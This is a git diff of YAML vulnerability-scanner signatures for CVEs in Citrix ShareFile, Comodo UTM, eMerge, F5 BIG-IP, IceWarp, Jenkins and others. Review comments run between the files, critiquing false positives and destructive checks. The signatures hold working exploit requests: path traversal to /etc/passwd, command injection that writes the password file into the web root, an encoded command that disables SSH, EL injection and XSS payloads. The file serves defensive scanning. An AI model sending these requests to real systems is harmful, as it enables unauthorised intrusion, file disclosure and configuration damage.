b/cves/citrix-sharefile-exposed.yaml deleted file mode 100644 index 94a6800..0000000 --- a/cves/citrix-sharefile-exposed.yaml +++ /dev/null 
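Review bot: Folding the old "ShareFile exposed" probe into the CVE-2020-7473 file means an empty 200 from `UploadTest.aspx` with `Access-Control-Allow-Origin: *` now reports the CVE on its own, since each request's detections appear to fire independently in this format; a fully patched StorageZones controller will be flagged whenever that page exists. Keep it as a fingerprint (its own signature, or a detection that only informs) and let the traversal request decide the CVE. Also, the deleted standalone file defined `root` as `{{.BaseURL}}` with no slash, whereas `{{.root}}/UploadTest.aspx` here depends on this file's `root` — if it follows the new convention `'{{.BaseURL}}/'`, the request goes to `//UploadTest.aspx`; please check the parameter above this hunk.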
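Review bot: The CVE-2020-8191 detection reads `StringSearch("resBody", "")`, which is true for any 200 from `menu/stapp`, so the signature reports reflected XSS on every reachable NITRO menu endpoint; the `appname=%0a` body contains no marker that could be searched for either. Put a unique token in the injected field and search for it, e.g. `appname=%0a%3Csvg/onload%3Dalert(8191)%3E` with `StringSearch("resBody", "onload=alert(8191)")`, so a hit demonstrates the unescaped reflection rather than the endpoint's existence.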
@@ -1,21 +0,0 @@ -id: citrix-share -info: - name: Citrix ShareFile Exposed - CVE-2020-7473 - risk: High - -params: - - root: "{{.BaseURL}}" - -requests: - - method: GET - redirect: false - url: >- - {{.root}}/UploadTest.aspx - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && ContentLength('body') == 0 && StringSearch('resHeader', 'Access-Control-Allow-Origin: *') - -reference: - - link: https://support.citrix.com/article/CTX269106 diff --git a/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml b/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml new file mode 100644 index 0000000..d770689 --- /dev/null +++ b/cves/citrix-sharefile-path-traversal-cve-2020-8982.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-8982 +info: + name: Citrix ShareFile Path Traversal + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}}XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "bit app support") && StringSearch("resBody", "fonts") && StringSearch("resBody", "extensions") + +references: + - https://www.cvebase.com/cve/2020/8982 diff --git a/cves/comodo-utmc-rce-cve-2018-17431.yaml b/cves/comodo-utmc-rce-cve-2018-17431.yaml new file mode 100644 index 0000000..850a267 --- /dev/null +++ b/cves/comodo-utmc-rce-cve-2018-17431.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2018-17431 +info: + name: Comodo Unified Threat Management Console RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + manage/webshell/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}u?s==5&w=218&h=15&k=%0a&l=62&_=5621298674064 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "Configuration has been altered") + - method: GET + url: >- + {{.root}}{{.endpoint}}u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "Configuration has been altered") +references: + - https://www.cvebase.com/cve/2018/17431 diff --git a/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml b/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml new file mode 100644 index 0000000..48e78d2 --- /dev/null +++ b/cves/deltek-maconomy-path-traversal-cve-2019-12314.yaml @@ -0,0 +1,22 @@ +id: CVE-2019-12314 +info: + name: Deltek Maconomy Path Traversal + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}/etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2019/12314 diff --git a/cves/emerge-rce-cve-2019-7256.yaml b/cves/emerge-rce-cve-2019-7256.yaml new file mode 100644 index 0000000..0541db7 --- /dev/null 
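Review bot: The second CVE-2018-17431 request is destructive: its `k` parameter `%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a` decodes to `service\nssh\ndisable\n`, so a scan that confirms the bug also turns off SSH on the customer's UTM appliance and leaves it that way ("Configuration has been altered" is literally the success string). A detection signature must not change device state by default; replace the command with a harmless one that still produces an observable result (a read-only `show`-type command, if the shell offers one), or move this step behind an explicit opt-in. The first request uses `u?s==5` while the second uses `s=5` — the doubled `=` looks like a typo.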
+++ b/cves/emerge-rce-cve-2019-7256.yaml @@ -0,0 +1,29 @@ +id: CVE-2019-7256 +info: + name: eMerge E3 RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + + +requests: + - method: GET + url: >- + {{.root}}card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20cvebase.txt%60 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + - method: GET + url: >- + {{.root}}cvebase.txt + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + +references: + - https://www.cvebase.com/cve/2019/7256 diff --git a/cves/exacqvision-web-service-rce-cve-2020-9047.yaml b/cves/exacqvision-web-service-rce-cve-2020-9047.yaml new file mode 100644 index 0000000..f6f0231 --- /dev/null +++ b/cves/exacqvision-web-service-rce-cve-2020-9047.yaml 
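Review bot: The CVE-2019-7256 payload `` `cat /etc/passwd > cvebase.txt` `` writes a copy of the target's password file into the web root and never removes it, so every confirmed host is left with a world-readable `cvebase.txt` for anyone else to download. Because stdout is redirected, the first request's `root:[x*]:0:0:` detection also cannot match — only the follow-up GET of `cvebase.txt` can — so the first check is dead weight. Prefer a payload whose output is returned in the same response (an `id` or `echo` of a unique token), or at minimum add a cleanup request that deletes the dropped file and document that this signature writes to the device.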
@@ -0,0 +1,22 @@ +id: CVE-2020-9047 +info: + name: exacqVision Web Service RCE + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}}version.web + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && (StringSearch("resBody", "3.10.4.72058") || StringSearch("resBody", "3.12.4.76544") || StringSearch("resBody", "3.8.2.67295") || StringSearch("resBody", "7.0.2.81005") || StringSearch("resBody", "7.2.7.86974") || StringSearch("resBody", "7.4.3.89785") || StringSearch("resBody", "7.6.4.94391") || StringSearch("resBody", "7.8.2.97826") || StringSearch("resBody", "8.0.6.105408") || StringSearch("resBody", "8.2.2.107285") || StringSearch("resBody", "8.4.3.111614") || StringSearch("resBody", "8.6.3.116175") || StringSearch("resBody", "8.8.1.118913") || StringSearch("resBody", "9.0.3.124620") || StringSearch("resBody", "9.2.0.127940") || StringSearch("resBody", "9.4.3.137684") || StringSearch("resBody", "9.6.7.145949") || StringSearch("resBody", "9.8.4.149166") || StringSearch("resBody", "19.03.3.152166") || StringSearch("resBody", "19.06.4.157118") || StringSearch("resBody", "19.09.4.0") || StringSearch("resBody", "19.12.2.0") || StringSearch("resBody", "20.03.2.0") || StringSearch("resBody", "20.06.3.0")) + +references: + - https://www.cvebase.com/cve/2020/9047 + diff --git a/cves/f5-bigip-rce-cve-2020-5902.yaml b/cves/f5-bigip-rce-cve-2020-5902.yaml new file mode 100644 index 0000000..092fc01 --- /dev/null +++ b/cves/f5-bigip-rce-cve-2020-5902.yaml 
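Review bot: The CVE-2020-9047 check is purely a version-string match against `version.web`, with an exact-build allow-list of 24 values, so a host on any build between or before those entries (or one that formats the version differently) is silently missed, while nothing about the RCE is exercised. Mark it accordingly — `confidence: Tentative` as the ShareFile signature in this commit does — and consider a `RegexSearch` on the major.minor prefix of the affected ranges instead of enumerating builds, with a comment pointing at the advisory's fixed versions so the list can be maintained.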
@@ -0,0 +1,31 @@ +id: CVE-2020-5902 +info: + name: F5 BIG IP TMUI RCE + risk: Critical + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + redirect: false + url: >- + {{.root}}tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") + + - method: GET + redirect: false + url: >- + {{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin + headers: + - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + detections: + - >- + StatusCode() == 200 && StringSearch('body', 'output"') && StringSearch('body', '{"error"') + +references: + - https://www.cvebase.com/cve/2020/5902 diff --git a/common/fortigate-xss.yaml b/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml similarity index 61% rename from common/fortigate-xss.yaml rename to cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml index f29bd24..2dd5bf6 100644 --- a/common/fortigate-xss.yaml +++ b/cves/fortinet-fortigate-vpn-path-traversal-xss-cve-2018-13379.yaml @@ -1,6 +1,6 @@ -id: fortigate-xss +id: CVE-2018-13379 info: - name: Fortinet VPN Path Traversal - CVE-2018-13379 + name: Fortinet Fortigate VPN Path Traversal & XSS risk: High params: @@ -16,7 +16,6 @@ requests: detections: - >- StatusCode() == 200 && StringSearch("body", "remote/login") && StringSearch("body", "') references: - - link: https://github.com/prisma-labs/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf \ No newline at end of file + - link: https://github.com/prisma-labs/graphql-playground/security/advisories/GHSA-4852-vrh7-28rf + - https://www.cvebase.com/cve/2020/4038 \ No newline at end of file 
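Review bot: The second CVE-2020-5902 request uses `{{.root}}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp`, and with `root` set to `'{{.BaseURL}}/'` that produces `//tmui/login.jsp/..;/...` — the doubled slash can alter how the `..;` normalisation bypass is resolved and differs from the first request's `{{.root}}tmui/...`; drop the leading slash. The two requests also disagree on the body alias (`"resBody"` versus `'body'`), and the second detection's `StringSearch('body', '{"error"')` accepts a response that contains an error object at all; matching on `"error":""` (empty error) would distinguish a successfully executed `list auth user admin` from a rejected one.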
diff --git a/cves/harboar-cve-2019-16097.yaml b/cves/harbor-missing-authorization-cve-2019-16097.yaml similarity index 75% rename from cves/harboar-cve-2019-16097.yaml rename to cves/harbor-missing-authorization-cve-2019-16097.yaml index f490d87..dbcdae6 100644 --- a/cves/harboar-cve-2019-16097.yaml +++ b/cves/harbor-missing-authorization-cve-2019-16097.yaml @@ -1,7 +1,6 @@ -# info to search signature -id: harbor-cve-01 +id: CVE-2019-16097 info: - name: Harbor privilege-escalation CVE-2019-16097 + name: Harbor Missing Authorization risk: High params: @@ -24,4 +23,4 @@ requests: StringSearch("response", "username has already") reference: - - link: https://nsfocusglobal.com/harbor-remote-privilege-escalation-vulnerability-cve-2019-16097-threat-alert/ \ No newline at end of file + - https://www.cvebase.com/cve/2019/16097 \ No newline at end of file diff --git a/cves/icewarp-lfi-cve-2019-12593.yaml b/cves/icewarp-lfi-cve-2019-12593.yaml new file mode 100644 index 0000000..5ba035e --- /dev/null +++ b/cves/icewarp-lfi-cve-2019-12593.yaml @@ -0,0 +1,30 @@ +id: CVE-2019-12593 +info: + name: IceWarp LFI + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + webmail/calendar/minimizer/index.php +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "[intl]") + - method: GET + url: >- + {{.root}}{{.endpoint}}?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc%5cpasswd + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") +references: + - https://www.cvebase.com/cve/2019/12593 
diff --git a/cves/icewarp-webmail-xss-cve-2020-8512.yaml b/cves/icewarp-webmail-xss-cve-2020-8512.yaml new file mode 100644 index 0000000..cb0ddf7 --- /dev/null +++ b/cves/icewarp-webmail-xss-cve-2020-8512.yaml @@ -0,0 +1,21 @@ +id: CVE-2020-8512 +info: + name: IceWarp WebMail XSS + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: GET + url: >- + {{.root}}webmail/?color=%22%3E%3Csvg/onload=alert(document.domain)%3E%22 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") + +references: + - https://www.cvebase.com/cve/2020/8512 diff --git a/cves/imind-server-info-leak-cve-2020-24765.yaml b/cves/imind-server-info-leak-cve-2020-24765.yaml new file mode 100644 index 0000000..0c1902b --- /dev/null +++ b/cves/imind-server-info-leak-cve-2020-24765.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-24765 +info: + name: iMind Server Information Leak + risk: High + +params: + - root: '{{.BaseURL}}/' + +requests: + - method: GET + url: >- + {{.root}}api/rs/monitoring/rs/api/system/dump-diagnostic-info?server=127.0.0.1 + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", 'This message is too large to display') + +references: + - https://www.cvebase.com/cve/2020/24765 diff --git a/cves/infinitewp-improper-authentication-cve-2020-8772.yaml b/cves/infinitewp-improper-authentication-cve-2020-8772.yaml new file mode 100644 index 0000000..877aac2 --- /dev/null +++ b/cves/infinitewp-improper-authentication-cve-2020-8772.yaml 
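Review bot: The CVE-2020-8512 detection is `StringSearch("resBody", "")`, an empty needle that matches every 200 from `webmail/`, so every reachable IceWarp login page is reported as XSS regardless of whether `color` is reflected unescaped. If the HTML tag in the needle was stripped during rendering it needs to be restored; otherwise search for the injected handler, `StringSearch("resBody", "onload=alert(document.domain)")`, which is the part that proves the reflection.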
@@ -0,0 +1,22 @@ +id: CVE-2020-8772 +info: + name: InfiniteWP Improper Authentication + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: +requests: + - method: POST + url: >- + {{.root}}wp-admin/ + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + body: _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ== + detections: + - >- + StringSearch("resHeaders", "IWPHEADER") + +references: + - https://www.cvebase.com/cve/2020/8772 diff --git a/cves/jboss-seam-code-execution-cve-2010-1871.yaml b/cves/jboss-seam-code-execution-cve-2010-1871.yaml new file mode 100644 index 0000000..850650e --- /dev/null +++ b/cves/jboss-seam-code-execution-cve-2010-1871.yaml @@ -0,0 +1,23 @@ +id: CVE-2010-1871 +info: + name: JBoss Seam 2 Code Execution + risk: High + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + seam-booking/home.seam +requests: + - method: GET + redirect: false + url: >- + {{.root}}{{.endpoint}}?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName(%27java.lang.Runtime%27).getDeclaredMethods()[7]} + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 302 && StringSearch("resHeader", "pwn.seam") && StringSearch("resHeader", "?pwned=") +references: + - https://www.cvebase.com/cve/2010/1871 diff --git a/cves/jenkins-audit-xss.yaml b/cves/jenkins-audit-xss.yaml deleted file mode 100644 index be00aa3..0000000 --- a/cves/jenkins-audit-xss.yaml +++ /dev/null 
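Review bot: The CVE-2010-1871 signature hard-codes `seam-booking/home.seam`, which is the path of the Seam sample application; real deployments expose their own `*.seam` pages under other context roots, so this will only ever fire against demo installs. Make `endpoint` a list of candidate pages (or let the operator supply the discovered `.seam` URL) and document that the `actionOutcome` EL payload works against any Seam 2 page, not just the booking demo. The detection itself is sound — a 302 whose `Location` contains `pwn.seam` and `?pwned=` shows the expression was evaluated — but note in a comment that `getDeclaredMethods()[7]` is reflection against `java.lang.Runtime` and is intentionally not invoking anything.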
@@ -1,25 +0,0 @@ -id: jenkins-audit-xss -info: - name: Jenkin Audit XSS (CVE-2020-2140) - risk: Medium - -params: - - root: "{{.BaseURL}}" - -variables: - - file: | - / - /jenkins/ -requests: - - method: GET - redirect: false - url: >- - {{.root}}{{.file}}descriptorByName/AuditTrailPlugin/regexCheck?value=*jsample - headers: - - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 - detections: - - >- - StatusCode() == 200 && StringSearch("response", "sample") && StringSearch("response", "regular expression") - -reference: - - link: https://github.com/jenkinsci/audit-trail-plugin/commit/40c6d621a03e6a50b291dca7188d07d0aa3de946 diff --git a/cves/jenkins-gitlab-xss-cve-2020-2096.yaml b/cves/jenkins-gitlab-xss-cve-2020-2096.yaml new file mode 100644 index 0000000..a886c56 --- /dev/null +++ b/cves/jenkins-gitlab-xss-cve-2020-2096.yaml @@ -0,0 +1,22 @@ +id: CVE-2020-2096 +info: + name: Jenkins Gitlab Hook XSS + risk: Medium + +params: + - root: '{{.BaseURL}}/' + +variables: + - endpoint: | + gitlab/ +requests: + - method: GET + url: >- + {{.root}}{{.endpoint}}build_now%3Csvg/onload=alert(1337)%3E + headers: + - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 + detections: + - >- + StatusCode() == 200 && StringSearch("resBody", "") +references: + - https://www.cvebase.com/cve/2020/2096 diff --git a/cves/jenkins-gitlab-xss.yaml b/cves/jenkins-gitlab-xss.yaml deleted file mode 100644 index 2febafa..0000000 --- a/cves/jenkins-gitlab-xss.yaml +++ /dev/null 
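Review bot: The CVE-2020-2096 detection is `StringSearch("resBody", "")`, which with an empty needle is true for any 200 from `gitlab/build_now...`, so the GitLab Hook plugin's mere presence is reported as XSS; the needle should be the reflected fragment, e.g. `StringSearch("resBody", "onload=alert(1337)")` (restoring the `<svg` tag if it was lost in rendering). This replacement also probes only `{{.root}}gitlab/`, whereas the signature it supersedes tried both `/` and `/jenkins/` prefixes — the common context path when Jenkins runs behind a servlet container — and the CVE-2019-10475 file in this same commit still lists both; add `jenkins/gitlab/` to `endpoint` for consistency.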
@@ -1,33 +0,0 @@
-id: jenkins-xss-01
-info:
- name: Jenkins Gitlab XSS - CVE-2020-2096
- risk: Medium
-
-variables:
- - prefix: |
- /
- /jenkins/
-
-requests:
- - method: GET
- redirect: true
- url: >-
- {{.BaseURL}}{{.prefix}}gitlab/build_now/a'">
- detections:
- - >-
- StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details")
- - >-
- StatusCode() == 200 && StringSearch("response", "Gitlab Web Hook")
- - method: GET
- redirect: true
- url: >-
- {{.BaseURL}}{{.prefix}}git/build_now/a'">
- detections:
- - >-
- StringSearch("response", "know how to process") || StringSearch("response", "See https://github.com/elvanja/jenkins-gitlab-hook-plugin for details")
- - >-
- StatusCode() == 200 && StringSearch("response", "Gitlab Web Hook")
-
-reference:
- author: j3ssie
- link: https://jenkins.io/security/advisory/2020-01-15/
\ No newline at end of file
diff --git a/cves/jenkins-xss-cve-2019-10475.yaml b/cves/jenkins-xss-cve-2019-10475.yaml
new file mode 100644
index 0000000..0c67572
--- /dev/null
+++ b/cves/jenkins-xss-cve-2019-10475.yaml
@@ -0,0 +1,38 @@
+id: CVE-2019-10475
+info:
+ name: Jenkins Build Metrics XSS
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ plugin/build-metrics/getBuildStats
+ jenkins/plugin/build-metrics/getBuildStats
+requests:
+ - method: GET
+ redirect: true
+ url: >-
+ {{.root}}{{.endpoint}}?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+ - method: GET
+ redirect: true
+ url: >-
+ {{.BaseURL}}{{.endpoint}}?label=reallylongtring
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("response", "reallylongtring")
+ - method: GET
+ redirect: true
+ url: >-
+ {{.BaseURL}}{{.endpoint}}?label=reallylongtring
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("response", "reallylongtring")
+references:
+ - https://www.cvebase.com/cve/2019/10475
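Review bot: The second and third requests are byte-identical (same `{{.BaseURL}}{{.endpoint}}?label=reallylongtring` URL, same detection), so one is a copy-paste duplicate that doubles the traffic for no extra signal. Both also build the URL from `{{.BaseURL}}{{.endpoint}}` although `endpoint` has no leading slash, whereas the first request uses `{{.root}}{{.endpoint}}` with `root` ending in `/`; as written the host name and `plugin/…` run together. Replace the pair with one request on `{{.root}}{{.endpoint}}?label=reallylongtring`, and note in `info` that this reflected-string check matches any page that echoes `label`, not only the vulnerable plugin version. The hard-coded `Jenkins-Crumb` value in the first URL is also unlikely to be valid on any instance other than the one it was captured from; if the endpoint enforces the crumb, that request fails before reflection happens.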
diff --git a/cves/jenkins-xss-cve-2020-2140.yaml b/cves/jenkins-xss-cve-2020-2140.yaml
new file mode 100644
index 0000000..bb3f180
--- /dev/null
+++ b/cves/jenkins-xss-cve-2020-2140.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-2140
+info:
+ name: Jenkins Audit Trail XSS
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ descriptorByName/AuditTrailPlugin/regexCheck
+ jenkins/descriptorByName/AuditTrailPlugin/regexCheck
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?value=*j%3Ch1%3Esample
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "sample")
+references:
+ - https://www.cvebase.com/cve/2020/2140
diff --git a/cves/jenkins-subversion-xss.yaml b/cves/jenkins-xss-cve-2020-2199.yaml
similarity index 64%
rename from cves/jenkins-subversion-xss.yaml
rename to cves/jenkins-xss-cve-2020-2199.yaml
index 4869fa3..3771a94 100644
--- a/cves/jenkins-subversion-xss.yaml
+++ b/cves/jenkins-xss-cve-2020-2199.yaml
@@ -1,6 +1,6 @@ -id: jenkins-subversion-xss +id: CVE-2020-2199 info: - name: Jenkin Subversion Partial XSS (CVE-2020-2199) + name: Jenkins Subversion Partial Release Manager XSS risk: Medium params:
@@ -21,6 +21,5 @@ requests: - >- StatusCode() == 200 && StringSearch("response", "java.lang.") && StringSearch("response", 'For input string: "zie"') -reference: - - link: https://www.jenkins.io/security/advisory/2020-06-03/ - - realPOC: http://{{.BaseURL}}/scm/SubversionReleaseSCM/svnRemoteLocationCheck?value=http://xx:%3Csvg/onload=alert(document.domain)%3E +references: + - https://www.cvebase.com/cve/2020/2199 \ No newline at end of file
diff --git a/cves/jenkins-xss.yaml b/cves/jenkins-xss.yaml
deleted file mode 100644
index d3b13cf..0000000
--- a/cves/jenkins-xss.yaml
+++ /dev/null
@@ -1,28 +0,0 @@
-id: cve-jenkins-01
-info:
- name: Jenkins XSS
-
-requests:
- - method: GET
- redirect: true
- url: >-
- {{.BaseURL}}/plugin/build-metrics/getBuildStats?label=reallylongtring
- detections:
- - >-
- StatusCode() == 200 && StringSearch("response", "reallylongtring")
- - method: GET
- redirect: true
- url: >-
- {{.BaseURL}}/jenkins/plugin/build-metrics/getBuildStats?label=reallylongtring
- detections:
- - >-
- StatusCode() == 200 && StringSearch("response", "reallylongtring")
- - method: GET
- redirect: true
- url: >-
- {{.BaseURL}}/plugin/build-metrics/getBuildStats?label=&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search
- detections:
- - >-
- StatusCode() == 200 && StringSearch("response", "onload=prompt")
-
-
diff --git a/cves/jira-improper-authorization-cve-2019-8446.yaml b/cves/jira-improper-authorization-cve-2019-8446.yaml
new file mode 100644
index 0000000..8a64643
--- /dev/null
+++ b/cves/jira-improper-authorization-cve-2019-8446.yaml
@@ -0,0 +1,32 @@
+id: CVE-2019-8446
+info:
+ name: Jira Improper Authorization
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ rest/issueNav/1/issueTable
+requests:
+ - method: POST
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - Connection: Close
+ - Sec-Fetch-User: ?1
+ - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
+ - Sec-Fetch-Site: none
+ - Sec-Fetch-Mode: navigate
